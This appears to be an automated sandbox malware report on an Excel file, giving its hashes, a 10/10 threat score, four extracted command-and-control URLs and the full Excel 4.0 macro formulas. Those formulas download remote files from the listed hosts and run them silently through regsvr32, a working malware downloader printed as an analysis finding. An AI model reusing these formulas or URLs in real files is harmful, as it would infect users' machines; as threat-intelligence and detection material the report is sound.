General

  • Target: 34d22071c39d6bd314e403e8eba0c753.xlsx

  • Size: 89KB

  • MD5: 34d22071c39d6bd314e403e8eba0c753

  • SHA1: 8a9f2ebc44e1dd885e36541d9064f43e98b9fcac

  • SHA256: 6d5a6f627ed27921596c22ca0344dd70495549c8b3df17e2067f865980f78238

  • SHA512: 621a3b7b31b929f85075c14ad3277c86bd05437a374ab20fbc618c4b3b9f967163b35f0a52ea21a1b76a8163a7d7a4a30436c18ab00496c03769d291552d8315

  • SSDEEP: 1536:d6k3hOdsylKlgxopeiBNhZFGzE+cL2kdAdHuS4lcTO9Tv7UYdEJi9az:8k3hOdsylKlgxopeiBNhZFGzE+cL2kdy

Score
10/10

Malware Config

Extracted

Rule: Excel 4.0 XLM Macro
C2

http://bruidsfotografie-breda.nl/cache/QPk/

http://www.chawkyfrenn.com/icon/JtT/

https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/

http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bruidsfotografie-breda.nl/cache/QPk/","..\phdg1.ocx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg1.ocx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.chawkyfrenn.com/icon/JtT/","..\phdg2.ocx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg2.ocx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://chiptochip.es/alojamiento-web/dofwXVVQ3hvsp/","..\phdg3.ocx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg3.ocx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://chillpassion.com/wp-content/nd4wjKgokzKbKH0DQDD/","..\phdg4.ocx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\phdg4.ocx")
    =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 34d22071c39d6bd314e403e8eba0c753.xlsx
    .xls .xlsx windows office2003